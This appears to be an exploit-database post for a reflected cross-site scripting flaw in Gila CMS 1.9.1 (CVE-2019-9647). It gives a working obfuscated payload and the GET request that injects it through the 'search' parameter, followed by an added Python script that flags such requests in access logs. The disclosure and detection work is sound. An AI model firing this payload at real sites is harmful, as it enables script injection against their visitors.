# Exploit Title: Gila CMS (search) Cross Site Scripting
# Date: 11.03.2019
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://gilacms.com
# Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip
# Demo Site: https://gilacms.com/demo/
# Version: 1.9.1
# Tested on: Kali Linux
# CVE: CVE-2019-9647
Exploit URL:
https://www.exploit-db.com/exploits/46557
Exploit:
Code:
# Vulnerable Parameter: search
# Payload to Add: <--`<img/src=` onerror=confirm``> --!>
# GET Request: http://localhost/?search=<--`<img/src=` onerror=confirm``> --!>
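Added example, not part of the original post: a log check that flags requests whose `search` parameter carries markup, as the GET request above does. It assumes combined-format access logs; the sample lines, IP addresses and the function name `suspicious_searches` are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined-log-format line: client IP first, request line in quotes.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A search term has no need for markup characters or inline event handlers.
SUSPICIOUS = re.compile(r"[<>`]|\bon\w+\s*=", re.IGNORECASE)

# Constructed sample log lines (not from the page); the second carries the
# page's test string in the URL-encoded form a browser would send.
SAMPLE_LOG = [
    '198.51.100.4 - - [11/Mar/2019:10:01:02 +0000] "GET /?search=gila+themes HTTP/1.1" 200 4312',
    '203.0.113.7 - - [11/Mar/2019:10:02:11 +0000] "GET /?search=%3C--%60%3Cimg/src=%60%20onerror=confirm%60%60%3E%20--!%3E HTTP/1.1" 200 5120',
    '198.51.100.9 - - [11/Mar/2019:10:03:40 +0000] "GET /blog?page=2 HTTP/1.1" 200 2210',
]


def suspicious_searches(lines):
    """Return (client_ip, decoded_value) for each flagged `search` value."""
    findings = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line this parser understands
        client, target = m.groups()
        # parse_qs percent-decodes the value and turns '+' into a space.
        query = urlsplit(target).query
        values = parse_qs(query, keep_blank_values=True).get("search", [])
        for value in values:
            if SUSPICIOUS.search(value):
                findings.append((client, value))
    return findings


if __name__ == "__main__":
    for client, value in suspicious_searches(SAMPLE_LOG):
        print(f"{client}\t{value!r}")
```
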
